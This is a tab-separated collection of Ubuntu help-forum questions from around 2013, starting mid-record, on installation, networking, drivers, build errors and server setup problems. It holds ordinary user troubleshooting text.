% , save = no source 1 : reference = 0 : 100 % 1 : 100 % , real = 0 : 100 % 1 : 100 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 100 % 1 : 100 % , save = no source 2 : reference = 0 : 100 % 1 : 100 % , real = 0 : 100 % 1 : 100 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 100 % 1 : 100 % , save = no the output with headphones out was identical . here 's pactl info with the headphones in : server string : unix : /run/user/1000/pulse/native library protocol version : 28 server protocol version : 28 is local : yes client index : 20 tile size : 65472 user name : zach host name : zach-m14xr2 server name : pulseaudio server version : 4.0 default sample specification : s16le 2ch 44100hz default channel map : front-left , front-right default sink : alsa_output.pci-0000_00_1b.0.iec958-stereo default source : alsa_input.pci-0000_00_1b.0.iec958-stereo cookie : c0e8:4e43 there was a difference here . when i ran the command without headphones it , the output read client index : 22 on line 5 . thanks for the feedback so far . afaik , there is nothing wrong with my headphones ; i 've used them on other devices . edit : the headphones are detected when plugged into the headset jack . sound settings will read `` headphones '' rather than `` speakers , '' and the headphones will momentarily crack when plugged in , but the speakers will continue to play over them .
397393	add menu item to the ubuntu gear menu in 13.10 saucy	i want to insert a custom menu item which points to a script in the gear `` system '' menu , say just after restart . if that 's not possible then anywhere else on the menu . how can i do that ? i installed alacarte but it does n't have any option for that
397395	xubuntu installer shows no partitions , crashes	i 'm trying to install xubuntu 13.04 on an hp envy h8-1414 desktop computer running windows 8 . i would like to set it up dual-boot . i downloaded the 64-bit amd desktop iso onto a usb device and booted from it . i am able to `` try ubuntu '' just fine - in fact i am writing this message from within firefox while trying it . but when i try to install it , the installer shows me this when trying to select a partition , see screen shots here : https : //sites.google.com/site/masridhar/xubuntu-install-problems ( i 'd love to show the screen shot inline instead of with a link , but i do n't have the 10 reputation points . ) i used gparted to carve out some space for ubuntu , and it shows me the partition list just fine . i also read in other threads on askubuntu that i should try using gdisk to check for errors in the gpt disk . but that seems to show that everything is fine . i 'd love to get xubuntu going on this machine . thanks in advance for your help ! sridhar edit : i forgot to mention that when i click the buttons in the partition screen on the installer , it crashes .
397396	not able to access ubuntu on my chromebook	i installed ubuntu on my acer chromebook but it did not reboot into ubuntu it went into chrome . how do i get into ubuntu ? brian
397397	how can i network 12.04 server and 12.04 desktop with the following setup	i have a desktop with 2 lan cards and a laptop with 1 lan card . i want to connect the laptop to the desktop , so the desktop can share resources . the desktop will be running ubuntu 12.04 server for serving ftp files . i am trying to setup a file server . neither computer needs to be connected to the internet . once i have this setup , i will ask another question on how to add internet . however , i would like this to be a straight connection , so i 'm not using a router . if i can do this .
397402	ca n't find/map a network drive to ubuntu 13.04	i 've attached a hard drive to my wireless router and i 'm trying to give all the household computers access to it . so far i have mapped the drive to a windows 8 laptop and to the windows 7 half of my ubuntu13/windows7 dual-boot computer . however when i come to my ubuntu partition i ca n't even find the drive , let alone map it . i was hoping i would be able to find the drive in ubuntu after mapping it to windows7 at least ( like how i can access my c : drive ) but i have n't been able to do that either . i 'm a complete noob when it comes to linux and the terminal so have n't been able to make much progress . can anyone help me ? thanks ! edit 1 : i 've managed to find the hard drive using smb : //tplinklogin.net through files > connect to server . but i ca n't map it to nautilus/file eplorer . edit 2/solution : the problem has been fixed . using the various network addresses provided by my router manufacturer ( tplinklogin.net being the router address ) was n't enough to access the network via the connect to network option under files in nautilus . turns out it just needed to be preceded by smb ( so smb : //tplinklogin.net ) . this allowed me to click on the button to continue to the network , at which point i could see and access the hard drive . doing this would automatically mount the drive to ubuntu but only for as long as the computer is on . to deal with this i just had to right click the mounted drive and bookmark it ( you can call the bookmark whatever you want ) . the drive still disappears once the computer is turned off , but clicking the bookmark ( which should remain ) will automatically route you to the hard drive and mount it for you , making sure you do n't have to go through the whole mounting process yourself . thanks to jo for helping me out !
397405	usb not detecting	computer : acer aspire m5-583p-6428 problem : i have ubuntu installed fine on my computer , nothing else . but on usb i have windows 7 ultimate which i want . but my computer wo n't detect the usb and wo n't install windows but on another computer usb works fine . i did a grub update but no luck . laptop has no cd insert place .
397413	how to partition ubuntu 13.10 in order to install windows 7 ? no dual boot	i have been using ubuntu for almost a year now , and it is just not working out for me . i would like to switch back to windows . i have both a windows 7 installation dvd , and a windows xp installation disc , as well as my old ubuntu 12.10 boot dvd before i updated . i am currently not running a dual boot system , it is solely ubuntu , i erased windows when i switched . i have no idea how to parition my drive to ntfs , and i would like to be able to do it in under 5 hours . i know i may be a bit vague , but does anyone have any ideas ?
397417	mp4 does not upload from android to ubuntu 1	i am experiencing issue uploading mp4 files from android to ubuntu 1 using the app as well as chrome browser . files are less than 150mb and there is enough space on my cloud . files does not upload in pictures folders and regular files folders . thanks , frăšdăšric
397418	use ubuntu server to create a wifi acces point	i have configured my ubuntu-server as a wifi acces point following this instruction : http : //wiki.ubuntuusers.de/wlan_router ? highlight=dnsmasq i can connect and authenticate . but i do n't want't dnsmasq to act as an dhcp server since there is already a router in the network acting as dhcp . is there a possibility to relay dhcp-queries which are send to the the ubuntu server to the router ? additional information : the router is a fritz ! box 7390 . it has the ip 10.0.0.1 and delivers adresses from 10.0.0.2 to 10.200.200.200 . subnet mask is 255.0.0.0 . greetings and thanks in advance , markus
397419	how to edit software and updates ' options in terminal ?	i need to edit software and updates ' options in terminal . namely the options : install updates from and automatical updates period , whether to check for them etc . etc . where can i find this options in the file system ?
397420	vlc blu-ray error	i have downloaded vlc player but it says this blu-ray error : path does n't appear to be a bluray your input ca n't be opened : vlc is unable to open the mrl 'bluray : ///dev/dvd ' . check the log for details .
397421	wifi extensions on virtualbox vm	i 'm running ubuntu on a virtualbox vm and i have a zyxel ag-225h v2 wi-fi adapter : when i give the ifconfig command to the terminal , the output is only eth0 and lo , but no wlan0 . how can i get the vm to detect my wlan0 ? thanks !
397423	what does it mean for a network interface to be primary ?	if i have two network interfaces , like eth0 and wlan0 , what does it mean if i configure wlan0 to be primary ? is eth0 disabled and unused until i configure it to be primary ? does it mean the primary interface is the one being used ?
397425	installing windows 7 with ubuntu from a native win8 laptop	computer is a acer aspire m5-583p-6428 . it came with windows 8 installed . i trashed the whole thing , made two partitions and now using ubuntu as a primary os . i 'd like to have windows 7 as another os . -- here 's the problem -- install has to be done from usb key ( no dvd ) - that ' ok. bios is in uefi , secure boot locked . it wo n't boot from the usb key . yes i checked the boot order . and yes , the key/port is working . i 'm wondering : it is possible to install windows 7 on the other partition from ubuntu ? so far , it seems like a lost cause . thanks !
397432	`` fatal error : gtk/gtk.h : no such file or directory '' using make	i am trying to use make command to build . i am following this . i am compiling a code using gtk+2 and c language hp @ ubuntu : ~/amhello $ make make all-recursive make [ 1 ] : entering directory `/home/hp/amhello' making all in src make [ 2 ] : entering directory `/home/hp/amhello/src' gcc -dhave_config_h -i . -i.. -g -o2 -mt main.o -md -mp -mf .deps/main.tpo -c -o main.o main.c main.c:3:20 : fatal error : gtk/gtk.h : no such file or directory compilation terminated . make [ 2 ] : *** [ main.o ] error 1 make [ 2 ] : leaving directory `/home/hp/amhello/src' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/hp/amhello' make : *** [ all ] error 2 this is the main.c code # include < config.h > # include < stdio.h > # include < gtk/gtk.h > void static call ( gtkwidget *widget , gpointer data ) { g_print ( `` % s \n '' , ( gchar* ) data ) ; } int main ( int agrc , char *agrv [ ] ) { gtk_init ( & agrc , & agrv ) ; gtkwidget *window , *button ; window=gtk_window_new ( gtk_window_toplevel ) ; g_signal_connect ( window , '' delete-event '' , g_callback ( gtk_main_quit ) , null ) ; gtk_window_set_title ( gtk_window ( window ) , '' one button '' ) ; button=gtk_button_new_with_label ( `` hello world '' ) ; g_signal_connect ( button , '' clicked '' , g_callback ( call ) , ( gpointer ) `` hello world '' ) ; gtk_container_set_border_width ( gtk_container ( window ) ,10 ) ; gtk_container_add ( gtk_container ( window ) , button ) ; gtk_widget_show_all ( window ) ; gtk_main ( ) ; return ( 0 ) ; }
397433	trouble configuring wordpress with phpmyadmin	so i 'm trying to set up wordpress to run through phpmyadmin , in conjunction with lamp . i 'm running ubuntu 12.10 ( if that matters ) , and i have n't found the answer to this question on this site yet ... .. my problem is , when i get on wordpress ( localhost/wordpress works fine ) every time i try to enter the information to configure wordpress with phpmyadmin , a page comes up that says : '' sorry , but i canât write the wp-config.php file . you can create the wp-config.php manually and paste the following text into it . '' then it 's followed by a box of code that i have no clue what i 'm supposed to do with : < ? php /** * the base configurations of the wordpress . * * this file has the following configurations : mysql settings , table prefix , * secret keys , wordpress language , and abspath . you can find more information * by visiting { @ link http : //codex.wordpress.org/editing_wp-config.php editing * wp-config.php } codex page . you can get the mysql settings from your web host . * * this file is used by the wp-config.php creation script during the * installation . you do n't have to use the web site , you can just copy this file * to `` wp-config.php '' and fill in the values . * * @ package wordpress */ // ** mysql settings - you can get this info from your web host ** // /** the name of the database for wordpress */ define ( 'db_name ' , 'wordpress ' ) ; /** mysql database username */ define ( 'db_user ' , 'wordpress ' ) ; /** mysql database password */ define ( 'db_password ' , '***** ' ) ; /** mysql hostname */ define ( 'db_host ' , 'localhost ' ) ; /** database charset to use in creating database tables . */ define ( 'db_charset ' , 'utf8 ' ) ; /** the database collate type . do n't change this if in doubt . */ define ( 'db_collate ' , '' ) ; /** # @ + * authentication unique keys and salts . * * change these to different unique phrases ! * you can generate these using the { @ link https : //api.wordpress.org/secret-key/1.1/salt/ wordpress.org secret-key service } * you can change these at any point in time to invalidate all existing cookies . this will force all users to have to log in again . * * @ since 2.6.0 */ define ( 'auth_key ' , 'd4crfqdv7 @ 3 : < ^vs_e/m ] u54a } , pto1pt-s8 { o7~3xq* < pn ( hsnmhiik @ j @ liial ' ) ; define ( 'secure_auth_key ' , '|a30 ] lizeob % 7 { x= [ pm`rx+uks $ +j+7 $ ( ( gx-0y- { rsdkq~ln ; vs @ jx|m0i8cv/ ] ' ) ; define ( 'logged_in_key ' , '+kk } .-z , @ % x|9 ] snw { -. , l { -m+cfwrf $ ) exn-gxfd_x74ui > ~f # i : laqwr7= % @ y ] ' ) ; define ( 'nonce_key ' , 'aco > p82i { i/o9+jl-v|w*b ? ug & ? n|t/t~i=`nz > jb2 > : # or^o % 5`by_dgynv2 ( ~w ' ) ; define ( 'auth_salt ' , 'j1pad.kk^owkw .lq @ ? @ ayzp4 ? 4swolcuw5wq7cfthxo-jm [ 7 } 3n^6w ! a ? % p+m # 0 ' ) ; define ( 'secure_auth_salt ' , 'djr+.-i=rb ) lj [ xi % r= & lv ( ? , # q , px/bcm 7hz2 [ 2b ? xxzp } ~ [ ) f { _+ol1rcg*t ] ' ) ; define ( 'logged_in_salt ' , ' [ ! ^ ( 2jj # gci2`-bc8 ( +jt~e8k_`kg % 6q < 6l > 1f~ed , nvnhcay ] z2ul1a=5xa < vn ) ' ) ; define ( 'nonce_salt ' , 's= ] 6 ] tvywdi- ( > + ) pa3 , b ; ^ : akxx < q # v [ x ? rl-fzmjh~r ! .3hiuj+v ; a,060 ) j2 [ ' ) ; /** # @ -*/ /** * wordpress database table prefix . * * you can have multiple installations in one database if you give each a unique * prefix . only numbers , letters , and underscores please ! */ $ table_prefix = 'wp_ ' ; /** * wordpress localized language , defaults to english . * * change this to localize wordpress . a corresponding mo file for the chosen * language must be installed to wp-content/languages . for example , install * de_de.mo to wp-content/languages and set wplang to 'de_de ' to enable german * language support . */ define ( 'wplang ' , '' ) ; /** * for developers : wordpress debugging mode . * * change this to true to enable the display of notices during development . * it is strongly recommended that plugin and theme developers use wp_debug * in their development environments . */ define ( 'wp_debug ' , false ) ; /* that 's all , stop editing ! happy blogging . */ /** absolute path to the wordpress directory . */ if ( ! defined ( 'abspath ' ) ) define ( 'abspath ' , dirname ( __file__ ) . '/ ' ) ; /** sets up wordpress vars and included files . */ require_once ( abspath . 'wp-settings.php ' ) ; i 'm a bit of a noob ( obviously ) , so this has me stumped . i 've tried uninstalling and reinstalling every program in lamp , i 've created new users , passwords , databases , ect . in phpmyadmin , and i still ca n't get this to work . i 'm forced to post the question here because every tutorial i 've seen about setting up wordpress does n't seem to have this issue . thank you !
397435	how change resolution screen of virtualbox ?	04 and i install mountain lion via virtual box , and i want to known how i can get full resolution with my monitor . i try to install guesst adittions and it tells me that is not possible
397438	can multiple vps be run under an existing vps ?	as the topic title asks ... can multiple virtual lamp servers be run on and existing vps lamp . my system windows 7x64 host vps vm-virtualbox running a lamp web server ( ubuntu13.10x32 ) i ask this question as a learning experience . additional questions ... if above is an option can multiple domains be accessed on this system via a single public ip address if topic title is not an option ... it i were a hosting provider ( for the sake of this experiment ) is there another way of doing this by using cpanel or plesk ? ie customers allocated individual cpanel accounts that only give them access to their own website on the server
397439	errors while compiling barracuda	i wanted to compile barracuda program . what i did was : untar this program using : tar -xvzf barracuda_source_r280.tar.gz then i typed make output is down here asmaa @ ubuntu : ~/downloads/barracuda $ make bntseq.c:31:18 : fatal error : zlib.h : no such file or directory compilation terminated . bntseq.c:31:18 : fatal error : zlib.h : no such file or directory compilation terminated . make : *** [ linux/release/objs/bntseq.c.o ] error 1 where did i fail ?
397443	vpn wo n't connect while ufw is enabled	i use a paid vpn service which uses openvpn . it works great and i have been pleased with it for months now . recently , i enabled , and began configuring , the firewall that is provided with ubuntu 13.10 : ufw firewall 13.10.2 . i also installed the gui for it to make things easier . by default , it blocks incoming connections and allows outgoing ones ( if i remember correctly ) . the problem i am having is with the nature of how the vpn service randomly assigns ip addresses . i can not effectively create a rule that can compensate for that . i can not even nail down a specific range of ips , let alone a specific ip itself . here are the results of an nslookup using the gateway i prefer : i know there has to be a way to allow the vpn and firewall to play nice together , and i have searched for answers . nothing of use has sprung up for me yet . i am not opposed to configuring ip tables and using ufw through the terminal , if need be . thank you to anyone who can give advice or a solution for this matter . edit : the results of iptables -l -v : http : //pastebin.com/u78dw8iq
397444	deleted partitions no booting issue please help ?	i deleted some partitions with another os on and i deleted the swap file to it and now when i boot the computer it come up with what appears to be a grub command line . i am a complete novice to linux altogether , which is probably why the issue occurred . i wondered how i could just boot into windows 8 , bearing in mind i still have ubuntu on a partition and windows 8 on a partition and a swap file between ?
397446	alt-sysrq-e kills init	note : yes , i have a qwerty keyboard . i also fully enabled sysrq with echo 1 > /proc/sys/kernel/sysrq while root earlier . tonight my laptop froze up while having chromium and minecraft open . after a while of waiting the system would n't respond again so i switched to tty1 ( very slowly ) and performed the safe reboot sequence ( alt-sysrq-reisub ) . when i got to e , text began to fly on my monitor . after that my keyboard 's capslock and scrolllock indicators began to blink endlessly . the text on my monitor was about : the top was the end of a traceback for a ext3 i/o function middle was full of errors concerning writing to somewhere on the disk , also errors about a bad superblock ( ! ) last line was kernel panic - not syncing : attempted to kill init ! ( exitcode : 0x00000007 ) when i rebooted i think fsck fixed the filesystem up ( i guess minecraft was in the middle of a save ) . my question is : why did alt-sysrq-e kill init when it should n't ?
397447	external monitor only works during login	recently my laptop screen broke , so i removed the hinges from laptop and bought external monitor . now my laptop boots into login screen [ via vga ] cable into the monitor , but as soon as i login , the signal gets lost . but here is the crazy part if i do ctrl + alt + f7 i login to tty4 and it shows up on monitor . from internet , i tried running sudo xrandr but i get ca n't open display . here is the some of the command output i got from internet lspci | grep vga 00:02.0 vga compatible controller : intel cor ... . ( rev 02 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] ... how do i fix it so that after login screen it shows ubuntu . since my boot screen is broken , i ca n't reinstall ubuntu . edits : hello it seems that if i remove vga cable and plug it back in it works.. thanks .
397450	steam resolution problem in ubuntu 12.04	first of all i m noob . i would like to know why since i have steam and installed games , steam is messing around with my pc resolution . when i reboot and dont use steam , some min later sometimes my resolution restores . whenever i use steam the problem get back again , is annoying ! i ve nvidia driver 304.108 , ubuntu 12.04 64bits gnome3.4.2 the resolution should be 1440x900 . please help
397451	ubuntu 13.04 terminal wont read my .ini file	i get this every time i attempt to access it commandlineparser : :read_config_file ( ) : could n't open xboxdrv-mouse.ini the command i was using was sudo xboxdrv -- config xboxdrv-mouse.ini it was for this tutorial on calibrating my logitech f310 to control my mouse cursor . remapping both mouse and keyboard to a gamepad ( the second comment ) . i couldnt comment as i have 0 reputation , and i need 50 to reply ...
397452	ubuntu touch for cubieboard3/cubietruck ?	i was wondering weather it would be possible to install the saucy-preinstalled-touch-armhf.tar.gz system onto a cubieboard3 ( cubietruck ) . the processor is an allwinner a20 ( armv7 architecture , which i know is supported ) . i know it is possible to install lubuntu desktop or server onto it via : http : //docs.cubieboard.org/tutorials/ct1/installation/install_lubuntu_desktop_server_to_sd_card '' i have the file saucy-preinstalled-touch-armhf.zip currently downloaded onto my windows machine . i do have an ubuntu system available if that is necessary .
397457	exact booting process of ubuntu ?	what is the exact booting process of ubuntu ( linux ) . i mean what files it will load and what status it will verify before start booting & in the booting how it will move . could some one explain ? thank you .
397458	i am not able to access any wireless network	i am new to ubuntu and i just put 13.10 on my computer . i not able to see any possible wireless connection . usually , or at least with windows vista i am able to view wireless connections that my computer could connect to , but it only gives me wired connections . i already installed the braodcom driver . also sometimes the ethernet stops working as well randomly .
397459	keyboard does n't work [ ubuntu 13.10 ] with tor browser	if you use ubuntu 13.10 , then you probably know that tor browser has a bug where you can not type anything , so it 's basically useless . i 'll show you how to fix this in a few easy steps .
397460	changed something to a system file , please help	i messed arround with the colour values in the file : /usr/share/themes/radiance/gtk-2.0/gtkrc can someone post the first line of that file ? or tell me what the original colours are ? i would like to go back to the original : ) ( everything after `` gtk-color-scheme = `` untill `` gtk-icon-sizes '' ) thanks in advance edit : i 'm using ubuntu 12.04
397461	black screen with mouse cursor upon boot , fixed by logging in	recently i had to reinstall my ubuntu 12.04 due to some kernel installation issues . so i grabbed a new livecd and installed it . went on to configure drivers and settings . i have bumblebee installed to handle the nvidia 620m for 3d applications and the intel hd4000 cpu integrated chip to do desktop environment and such . the issue being is after bumblebee was installed i didn’t see the login in screen anymore . but i heard the login screen sound so i typed in my password hit enter and voila it works . i want to fix this though what i have found so far is . in virtual console starting lightdm returns with failed to use bus name org.freedesktop.displaymanager do you have the appropriate permissions ? i 've looked around and cant find a solution similar problem i 've seen like this was just unity to starting at all mine starts but only after logging in . if i need to supply additional info please tell me so and i will do so . another discovery/insight . turning on alpm https : //wiki.ubuntu.com/kernel/powermanagementalpm cause 's the screen to be black on launch as well as the device isn’t properly called . also has weird side effect on the wifi . so i have it `` fixed '' what i did is was a 12 hour wild goose chase around ubuntu ^^ in all seriousness i reinstalled to make sure it a a reproduce-able issue . after confirming it was i went into /etc/bumblebee/xorg.conf.nvidia and added my pci busid of my video card . this was to make bumblebee work . after i done this i had the same issue again . after some research i changed line 15 in /etc/bumblebee/bumblebee.conf turncardoffatexit=false into turncardoffatexit=true . now everything works as far as i can tell have to do some more testing . another issue i have now even before bumblebee is that loging in takes ages ( 20+ sec ) . would be nice if someone has an idea what that does . edit : this does bring up the question that 620m doesn’t work out of the box ( meh it 's linux nothing does ) but if you follow http : //askubuntu.com/a/36936/229978 there is no mention of it . edit 2 : still broken open for any suggestions
397462	why ca n't i connect to ssh server from ubuntu client ? ( while windows client is okay )	i have configured an ssh server on a ubuntu 12.04 lts machine . i changed the listening port to the one different from the default port 22 ( that 's the only change i made on the server ) . i am trying to connect to the server from a ubuntu remote machine but the connection is refused . the weird thing is that i can connect to the server from a windows remote machine . what makes this difference ? how can i make the ubuntu remote machine get connected to the server ? [ server ] os : ubuntu 12.04.03 64bit desktop checked the ssh process is running firewall : not changed from default status checked the ssh port is open to public [ ubuntu remote machine ] os : ubuntu 13.04 or 13.10 64bit desktop client software : vinagre firewall : not changed from default status [ windows remote machine ] os : windows 7 ultimate 64bit client software : tera term firewall : not changed from default status
397465	how to install clamav for plesk	i am trying to find directions to install clamav for plesk panel . i have n't found a straight answer or way to enable it within the panel . i 've searched everywhere . can anyone help ? i tried doing a simple apt-get clamav but it does n't show in the panel .
397470	fan speed on full blast when doing zero to moderate tasks	i just switched from windows to ubuntu 12.04 recently and i 'm having cpu fan problems . it seems as though there is only an on ( fan is on full blast ) and off configurations when the system is monitoring cpu temperature . doing moderate tasks , the cpu fan is on full blast . when left idle , the fan turns off . before i switched the os , i updated to the recent bios 11/4/13 update and the fan was working perfectly fine . it had a off , moderate , and full fan speeds . my system : dell inspiron 3521 pentium 2117u ( no amd graphics , only integrate intel hd therefore there is only one fan ) . i was wondering if the fan has an `` in between moderate '' fan speed because it can be quite noisy .
397478	ubuntu vm launcher and topbar not displaying properly in kvm	i am new to kvm . i installed a ubuntu vm on ubuntu host earlier and there was no problem . but that vm had to be completely reinstalled after some experimentation messed it up . everything went well during the reinstallation . but when i run the guest , the launcher and top bar are displayed off colour in low resolution . the applications windows are displayed as good as host but even some dialog boxes of applications suffer the same problem , making them unreadable . i have tried to set to ubuntu 2d but no improvement . is there any setting that i should change to correct this ? thanks for any help .
397481	how to make a persistent live ubuntu usb with more than 4gb	i want to make a persistent live ubuntu/ mint usb drive with more than 4gb of storage . i know there is an option of installing linux directly on the drive but i dont want to do this as it will restrict the drive from working on different computers . one options is to make an additional partition with extra space but if i do this how do i make newly installed software be stored on this partition ? thanks !
397484	xfce desktop show fuzzy lines	i do n't know why but there are times when my desktop will look fuzzy as well as the icons on it . the panels are unaffected and so are the programs running , i will just see the fuzziness when i go to look at my desktop . http : //i.stack.imgur.com/vsuy4.png ( here is the link to a screenshot of my desktop ) when i click the icons , their fuzziness goes away but the area around them is still the same . when i log out then login , everything is back to normal . i am running ubuntu 13.10 in xfce session .
397485	what to do when i get an `` attempt to read or write outside of disk 'hd0 ' '' error and boot repair does not solve the problem ?	i tried to install xbuntu 13.10 on an older computer . i noticed some difficulties during installation that may be relevant to my problems . notably : the screen resolution was extremely low . the windows were much larger than the screen and i had to move them around to get to the `` next '' button . the mouse cursor was a blur of colours that was flashing all the time . the installation finished and i tried to reboot the computer . immediately i got : error : attempt to read or write outside of disk 'hd0 ' . entering rescue mode ... grub rescue > i made a boot repair usb disk , booted it and chose the default repair . the application told me that the problem is repaired and that if this does not solve my problem i should show this link to someone who can help me . what should i do next ? i already tried to install ubuntu and xubuntu , both with no success . edit : i found a workaround . insert the xubuntu live usb select `` try xubuntu '' in the settings menu select `` install xubuntu '' this fixed the problem for me . since it is solved i can not test the answer .
397486	touchscreen behavior different	i have a dell inspiron touchscreen laptop with windows 8.1 . i have installed ubuntu 13.10 as dual boot option . i normally use touch to scroll while browsing in windows . but in ubuntu when i use touch , it selects the content instead of scrolling . is there a way i can alter the behavior ? thanks , kk
397488	which macs will run ubuntu ?	i am wondering what models of macintosh will run ubuntu , and if so , which versions of ubuntu ? i have an imac g3 and a model ii emac . i am looking to buy other macs as well , but whatever is more relevant would be great .
397491	app is not running after tarball file was expanded	since the latest blender is not found in the ubuntu software centre i downloaded it directly from their web site . however , now double-clicking on the blender app wo n't do a thing : ( i expanded the tarball file into a new folder in the home directory , i called this folder apps . any ideas ? thanks in advance guys . jdl
397492	how to start ubuntu after installation ( no choice : only windows starts )	after testing ubuntu on a usb stick i installed it alongside windows , no problems thusfar . but , after restarting i did not get the screen giving me the choice between ubuntu and windows , only windows started up immediately . hitting esc , f2 , f12 and/or del during start up did not help at all . i am using windows 7 on a sony vaio `` p '' . i would appreciate all help and advice because ubuntu looks really good . many thanks .
397493	what does the first character of unix mode string indicate ?	i 'm very familiar with linux file permissions , and special perms ( sticky bit , suid , guid ) but i do n't know what the c stands for ? is it a permission , or something else ? i 've done some googling with and ca n't figure it out . here 's the device file that has it . steven @ a215 : ~ $ ls -l /dev/null crw-rw-rw- 1 root root 1 , 3 dec 29 20:58 /dev/null
397495	optical drive , external floppy and external hard drive are not appearing in the file manager	i have just upgraded ubuntu 12.10 to 13.10 . i first upgraded to 13.04 , then to 13.10 . when i click on files , then click on computer , my optical drives , hard drive , and external drive do not appear in the file manager window . is there a way to fix this ? i hope i phrased this question better this time .
397496	junit/junit4 problem	problem : the project uses a class library called `` junit_4 '' , but this class library is not currently defined locally . solution : click resolve to download or otherwise automatically define this library . i installed it by sudo apt-get install junit but junit4 can not be installed so i got the file jar of it from internet and used library manager to add it but problem still persists .
397502	reboot a server from command line ?	how do i reboot a ubuntu server from the command line ? sudo reboot now never seems to work for me . because its a server , i do n't have a window manager installed , so i ca n't do it from a gui ( which always seems to work ) . i 've had the problem for years on different versions of the operating system . it happens in virtual machines and on real metal . the same problem exists with sudo shutdown now , too . i 've lived with it in the past . the difference now is i do n't want to just hit the power button because i might lose data .
397511	why are there multiple root users in database ?	i 'm trying to setup owncloud in a test lab . at the setup screen ( initial login over from the web ) , i 'm having a heck of a time connecting to the mysql database . i ca n't log in as either debian-sys-maint or root when setting up the database . i followed tohuwawohu 's answer at ca n't log to mysql , and i was able to login as debian-sys-maint and set root 's password ( i think ) . but the problem persisted . i say `` i think '' because the password change command said it selected 4 rows and changed 0 rows . when i perform a select user from mysql.user ; , i 'm shown 4 root users : for completeness , i also tried re-running mysql server 5.5 setup according to my mysql installation is broken . how to completely reconfigure it ? . why are there multiple root users ? should n't there be just one ?
397512	dmz ( demilitary zone )	i 'm using one computer with installing virtualbox , in computer physic use for chillispot , and virtualbox use freeradius+mysql-server and how to connect chillispot and freeradius in diifferent computer server ?
397515	please help me connect to the internet	i recently installed a tp-link tl-wn725n wifi usb dongle . ( see please help me install this usb wifi adapter ) the device is recognized by ubuntu , and i 'm able to connect to my home wifi network . i get a valid ip address from my isp , but i 'm unable to browse the web . if i try to navigate to , or ping , google.com , i get `` unknown host google.com '' . the device works perfectly in windows , so the problem likes somewhere in ubuntu . i 'm pretty new to linux , and i do n't know where to start . i would really appreciate any help i can get . thanks .
397518	how can java and apache tomcat 7 install in the ubuntu 12.04 server ?	i new in the ubuntu and i install java in this using oracle vm virtual box . i download jdk after what doing for java install and than after install apache tomcat 7. please help me both software install in ubuntu . thanks .
397521	ubuntu crashes evertime i open system settings	i just upgraded to ubuntu 13.10 . every-time i open system settings ubuntu crashes . is there a fix for this .
397522	problems with initial boot	i just built a brand new computer with an ssd . since i do n't have windows yet , i decided to install ubuntu for the time being . i was able to get the system to recognize the cd drive , but the system will lock up on the languages and `` install/try ubuntu '' screen . help !
397523	can not ge 12.10 to upgrade to 13.10 - upgrade not possible with this tool error	i have tried using the update-manager to upgrade from 12.10 to 13.10 . after it checks for updates , it shows that 13.10 is available and asks if i want to upgrade . i say yes and then it downloads two files and give me an error message saying the upgrade can not be done with this tool . i have searched and searched . when i create a bootable 13.10 flash drive and try to install , it only wants to override my entire disk . when i try manual , things do not get much better . if i can not get this to work , how might i remove ubuntu 12.10 and the grub 2.0 boot manager ?
397527	localhost cant connect to 127.0.0.1	i have some java systems that i want to use hadoop in with it , but whenever i connect to localhost with this command hadoop fs -ls / it will always prompt that java.net.unknownhostexception : local.localdomain : diginiqlinux.localdomain at java.net.inetaddress.getlocalhost ( inetaddress.java:1466 ) edit here is my //etc/hosts 127.0.0.1 localhost full trace log [ root @ diginiqlinux ~ ] # hadoop fs -ls 13/12/30 16:44:36 info metrics.metricsutil : unable to obtain hostname java.net.unknownhostexception : diginiqlinux.localdomain : diginiqlinux.localdomai n at java.net.inetaddress.getlocalhost ( inetaddress.java:1466 ) at org.apache.hadoop.metrics.metricsutil.gethostname ( metricsutil.java:91 ) at org.apache.hadoop.metrics.metricsutil.createrecord ( metricsutil.java:8 0 ) at org.apache.hadoop.security.usergroupinformation $ ugimetrics. < init > ( use rgroupinformation.java:102 ) at org.apache.hadoop.security.usergroupinformation. < clinit > ( usergroupinf ormation.java:208 ) at org.apache.hadoop.fs.filesystem $ cache $ key. < init > ( filesystem.java:1757 ) at org.apache.hadoop.fs.filesystem $ cache $ key. < init > ( filesystem.java:1750 ) at org.apache.hadoop.fs.filesystem $ cache.get ( filesystem.java:1618 ) at org.apache.hadoop.fs.filesystem.get ( filesystem.java:255 ) at org.apache.hadoop.fs.filesystem.get ( filesystem.java:124 ) at org.apache.hadoop.fs.fsshell.init ( fsshell.java:86 ) at org.apache.hadoop.fs.fsshell.run ( fsshell.java:1813 ) at org.apache.hadoop.util.toolrunner.run ( toolrunner.java:65 ) at org.apache.hadoop.util.toolrunner.run ( toolrunner.java:79 ) at org.apache.hadoop.fs.fsshell.main ( fsshell.java:1974 ) caused by : java.net.unknownhostexception : diginiqlinux.localdomain at java.net.inet4addressimpl.lookupallhostaddr ( native method ) at java.net.inetaddress $ 1.lookupallhostaddr ( inetaddress.java:894 ) at java.net.inetaddress.getaddressesfromnameservice ( inetaddress.java:128 6 ) at java.net.inetaddress.getlocalhost ( inetaddress.java:1462 ) ... 14 more ls : can not access . : no such file or directory . any solution how to connect localhost ?
397533	acces point on wireless card with no master mode	i have a laptop with intel速 centrino速 ultimate-n 6300 wireless card and ubuntu 13.10 running in it . i have to create access point to share my internet with my other devices . unfortunately , it does not support master mode and hence can not create access point via the method in the link https : //help.ubuntu.com/community/wifidocs/wirelessaccesspoint . but in windows , connectify runs fine and creates wireless access point without any hitch . what is that windows has that ubuntu doesnt ? i hate booting to windows just because i have to create wireless access point . there has to be a workaround !
